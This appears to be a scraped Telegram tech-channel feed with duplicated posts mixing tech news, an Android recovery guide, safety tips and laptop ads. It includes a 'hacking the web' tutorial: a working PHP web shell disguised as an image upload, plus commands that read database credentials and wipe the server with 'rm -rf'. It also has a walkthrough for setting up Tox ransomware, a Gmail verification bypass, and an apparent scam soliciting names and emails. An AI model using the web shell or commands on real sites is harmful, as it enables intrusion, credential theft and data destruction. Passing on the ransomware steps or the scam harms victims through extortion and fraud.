FireEye: Russian Research Lab Aided the Development of TRITON Industrial Malware
Cybersecurity firm FireEye claims to have discovered evidence that proves the involvement of a Russian-owned research institute in the development of the TRITON malware that caused some industrial systems to unexpectedly shut down last year, including a petrochemical plant in Saudi Arabia.
TRITON, also known as Trisis, is a piece of ICS malware designed to target the Triconex Safety
β @Geekstechcomputers β
Cybersecurity firm FireEye claims to have discovered evidence that proves the involvement of a Russian-owned research institute in the development of the TRITON malware that caused some industrial systems to unexpectedly shut down last year, including a petrochemical plant in Saudi Arabia.
TRITON, also known as Trisis, is a piece of ICS malware designed to target the Triconex Safety
β @Geekstechcomputers β
π΄ How to recover deleted image or video from android (internal
storage) without root β
βͺοΈSTEP 1: DOWNLOAD AND INSTALL JIHOSOFT
ANDROID PHONE RECOVERY AT YOUR COMPUTER.
πYou could download the Windows version at:
Android Recovery , download Mac version at:
Android Recovery for Mac . After download, you will
be lead to install the app at your computer.
βͺοΈSTEP 2: SELECT DATA GENRE THAT YOU NEED TOSCANAfter installation, run the app at your PC. You willsee the interface show you four options:
πβMulβ, βDatabaseβ, βWhatsAppβ, βAllβ. Tap
One of it according to your own demand.
βͺοΈSTEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER.
πFirst, connect your android device to computer via USB cable. Then, turn on USB debugging at android
equipment.If the app failed to identify your equipment, install related USB driver at your computer.
βͺοΈSTEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT
πAfter identification, click "Start" for scanning.
Please be patient about the process.
βͺοΈSTEP 5: PREVIEW DATA THAT LISTED ON THE
RESULT.
πYou will be able to review all the details of desired
data.
βͺοΈSTEP 6: RECOVER DATA FROM ANDROID WITHOUT
ROOT.
πMark those data that you want, then tap βRecoverβto fulfill android data recovery without root.
storage) without root β
βͺοΈSTEP 1: DOWNLOAD AND INSTALL JIHOSOFT
ANDROID PHONE RECOVERY AT YOUR COMPUTER.
πYou could download the Windows version at:
Android Recovery , download Mac version at:
Android Recovery for Mac . After download, you will
be lead to install the app at your computer.
βͺοΈSTEP 2: SELECT DATA GENRE THAT YOU NEED TOSCANAfter installation, run the app at your PC. You willsee the interface show you four options:
πβMulβ, βDatabaseβ, βWhatsAppβ, βAllβ. Tap
One of it according to your own demand.
βͺοΈSTEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER.
πFirst, connect your android device to computer via USB cable. Then, turn on USB debugging at android
equipment.If the app failed to identify your equipment, install related USB driver at your computer.
βͺοΈSTEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT
πAfter identification, click "Start" for scanning.
Please be patient about the process.
βͺοΈSTEP 5: PREVIEW DATA THAT LISTED ON THE
RESULT.
πYou will be able to review all the details of desired
data.
βͺοΈSTEP 6: RECOVER DATA FROM ANDROID WITHOUT
ROOT.
πMark those data that you want, then tap βRecoverβto fulfill android data recovery without root.
HACKING THE WEB
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)
?cmd=rm+-rf
πDone happy hacking.
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)
?cmd=rm+-rf
πDone happy hacking.
Simple steps to avoid being a Cybercrime Victim
γ°γ°γ°γ°γ°γ°γ°γ°γ°
1.Avoid using public networks.Refrain from connecting to free Wi-Fi networks from coffee shops or other public places. Connecting your device to public networks exposes it potential hackers that can easily get through the low level security of these kinds of networks.
2.Avoid using public computers for sensitive business. If youβre about to do some personal transactions like banking or online shopping, do not do it using public computers. Other people who have used the computers before you may have put programs that can record the passwords you type in.
3.Do not give out your passwords.Keep the passwords of your various accounts to yourself. If you do let someone know, make sure to change it afterwards to prevent that person from accessing your private internet accounts without permission.
4.Avoid downloading unknown applications. The Internet is full of free software from unknown sources. These kinds of programs normally carry malicious applications with it and installing it may infect and cause serious damage to your computer.
γ°γ°γ°γ°γ°γ°γ°γ°γ°
1.Avoid using public networks.Refrain from connecting to free Wi-Fi networks from coffee shops or other public places. Connecting your device to public networks exposes it potential hackers that can easily get through the low level security of these kinds of networks.
2.Avoid using public computers for sensitive business. If youβre about to do some personal transactions like banking or online shopping, do not do it using public computers. Other people who have used the computers before you may have put programs that can record the passwords you type in.
3.Do not give out your passwords.Keep the passwords of your various accounts to yourself. If you do let someone know, make sure to change it afterwards to prevent that person from accessing your private internet accounts without permission.
4.Avoid downloading unknown applications. The Internet is full of free software from unknown sources. These kinds of programs normally carry malicious applications with it and installing it may infect and cause serious damage to your computer.
upgrade your laptop with high speed pc3l ram @2500 only......inbox me @febifebian
The Next Version of Windows 10 Will Finally Fix Start Menu File Search
https://www.howtogeek.com/392301/the-next-version-of-windows-10-will-finally-fix-start-menu-file-search/
https://www.howtogeek.com/392301/the-next-version-of-windows-10-will-finally-fix-start-menu-file-search/
How-To Geek
The Next Version of Windows 10 Will Finally Fix Start Menu File Search
Today, Windows 10βs Start menu only searches for files in your libraries and on your desktop. In the next version of Windows, it will search everywhere on your PC. This uses the existing Windows search index.
*iPhone users with iOS 10 and above*
We are looking for iOS 10 or above users to participate in facebook research program which you will earn 100-500$ without doing anything
βΌ *Please the time is here, act now and earn big without doing anything, no investment*
Please send your *Full name and email address* to mr now to *get invitation.*
Join our group for more info
ππππ€³πΎπππ
*iPhone users with iOS 10 and above*
https://t.me/joinchat/JX5DfEiST7paUgG7DcXL6A
We are looking for iOS 10 or above users to participate in facebook research program which you will earn 100-500$ without doing anything
βΌ *Please the time is here, act now and earn big without doing anything, no investment*
Please send your *Full name and email address* to me now to *get invitation.*
We are looking for iOS 10 or above users to participate in facebook research program which you will earn 100-500$ without doing anything
βΌ *Please the time is here, act now and earn big without doing anything, no investment*
Please send your *Full name and email address* to mr now to *get invitation.*
Join our group for more info
ππππ€³πΎπππ
*iPhone users with iOS 10 and above*
https://t.me/joinchat/JX5DfEiST7paUgG7DcXL6A
We are looking for iOS 10 or above users to participate in facebook research program which you will earn 100-500$ without doing anything
βΌ *Please the time is here, act now and earn big without doing anything, no investment*
Please send your *Full name and email address* to me now to *get invitation.*
β HOW TO MAKE A RANSOMWARE?
McAfee discovered in the deep web a ransomware-construction kits that allow easy to build malware in just 3 steps.
TOX β FREE RANSOMWARE KIT
- Now, to spread this creepy threat more easily by even a non-tech user, one dark web hacker has released a ransomware-as-a-service kit, dubbed βTox,β for anyone to download and set up their own ransomware for free.
- Tox is completely free to use. The developers of the online software make money by taking a cut (20%) of any successful ransomware campaigns its users run.
- Tox, which runs on TOR, requires not much technical skills to use and is designed in such a way that almost anyone can easily deploy ransomware in three simple steps, according to security researchers at McAfee who discovered the kit.
- Tox is free. You just have to register on the site.
- Tox is dependent on TOR and Bitcoin. That allows for some degree of anonymity.
- The malware works as advertised.
πOut of the gate, the standard of antimalware evasion is fairly high, meaning the malwareβs targets would need additional controls in place (HIPS, whitelisting, sandboxing) to catch or prevent this.
------------------------------------------------------
β HOW TO SETUP YOUR CUSTOM RANSOMWARE?
It takes only a few seconds to create and set up your custom ransomware.
πJust create an account on the Tox website, without the need to provide your email address or any other identifying information.
πOnce a user register with the site, follow these three simple steps to creating your own malware:
πType a desired ransom amount you want to ask victims for.
πProvide an additional note in the βCauseβ, presumably the message that will alert victims that they are being held hostage to a piece of malware.
πFinally, you are prompted to fill out a captcha, and click βCreateβ.
- This process creates an executable of about 2MB that is disguised as a .scr file,β McAfee explains. βThen the Tox users distribute and install as they see fit. The Tox site (runs on the TOR network) will track the installs and profit. To withdraw funds, you need only supply a receiving Bitcoin address.
π€The most important part is that, the bitcoin paid by the victim will be credited to users account. Tox will keep a 30% fee of the income.
- As it seems tox ransomware is a new breed of malware as a service allowing anyone to earn Bitcoins without requiring any hacking or programming skills. Thus creating a new trend of malware spreading.
McAfee discovered in the deep web a ransomware-construction kits that allow easy to build malware in just 3 steps.
TOX β FREE RANSOMWARE KIT
- Now, to spread this creepy threat more easily by even a non-tech user, one dark web hacker has released a ransomware-as-a-service kit, dubbed βTox,β for anyone to download and set up their own ransomware for free.
- Tox is completely free to use. The developers of the online software make money by taking a cut (20%) of any successful ransomware campaigns its users run.
- Tox, which runs on TOR, requires not much technical skills to use and is designed in such a way that almost anyone can easily deploy ransomware in three simple steps, according to security researchers at McAfee who discovered the kit.
- Tox is free. You just have to register on the site.
- Tox is dependent on TOR and Bitcoin. That allows for some degree of anonymity.
- The malware works as advertised.
πOut of the gate, the standard of antimalware evasion is fairly high, meaning the malwareβs targets would need additional controls in place (HIPS, whitelisting, sandboxing) to catch or prevent this.
------------------------------------------------------
β HOW TO SETUP YOUR CUSTOM RANSOMWARE?
It takes only a few seconds to create and set up your custom ransomware.
πJust create an account on the Tox website, without the need to provide your email address or any other identifying information.
πOnce a user register with the site, follow these three simple steps to creating your own malware:
πType a desired ransom amount you want to ask victims for.
πProvide an additional note in the βCauseβ, presumably the message that will alert victims that they are being held hostage to a piece of malware.
πFinally, you are prompted to fill out a captcha, and click βCreateβ.
- This process creates an executable of about 2MB that is disguised as a .scr file,β McAfee explains. βThen the Tox users distribute and install as they see fit. The Tox site (runs on the TOR network) will track the installs and profit. To withdraw funds, you need only supply a receiving Bitcoin address.
π€The most important part is that, the bitcoin paid by the victim will be credited to users account. Tox will keep a 30% fee of the income.
- As it seems tox ransomware is a new breed of malware as a service allowing anyone to earn Bitcoins without requiring any hacking or programming skills. Thus creating a new trend of malware spreading.
π²HOW TO BYPASS GMAIL MOBILE VERIFICATION TUTORIALπ²
STEP-1
β»οΈGo to K7.net Sign up there.
STEP-2
β»οΈCreate an account on gmail, but in location fill United States.
STEP-3
β»οΈAfter Creating your e-mail account,Now it will take you to mobile verification page.
STEP-4
β»οΈHere select the option of Voice call and fill the no: that you got from the website (k7.net)
STEP-5
β»οΈNow you will get a mail having verification code as voice mail on that account from which you have registered on.
STEP-6
β»οΈGo open it,
download
the attachment file and listen the code after that type the code of your voice mail in verification code and click
OK
β Done. Your account is ready now.
π‘ @Geekstechcomputers
STEP-1
β»οΈGo to K7.net Sign up there.
STEP-2
β»οΈCreate an account on gmail, but in location fill United States.
STEP-3
β»οΈAfter Creating your e-mail account,Now it will take you to mobile verification page.
STEP-4
β»οΈHere select the option of Voice call and fill the no: that you got from the website (k7.net)
STEP-5
β»οΈNow you will get a mail having verification code as voice mail on that account from which you have registered on.
STEP-6
β»οΈGo open it,
download
the attachment file and listen the code after that type the code of your voice mail in verification code and click
OK
β Done. Your account is ready now.
π‘ @Geekstechcomputers
*Teaser 3 - GBWhatsApp 6.60* π
βοΈ Enabled - Stickers π
*Stay Tuned for Big Update* π
TEAM
Geeksπ
βοΈ Enabled - Stickers π
*Stay Tuned for Big Update* π
TEAM
Geeksπ
Windows Built-in Antivirus Gets Secure Sandbox Mode β Turn It ON
https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html
https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html
Febi Febian:
asus 4gb ram 500gb hdd 2.1ghz clock speed @22k inbox @febibian / call 0716909890
asus 4gb ram 500gb hdd 2.1ghz clock speed @22k inbox @febibian / call 0716909890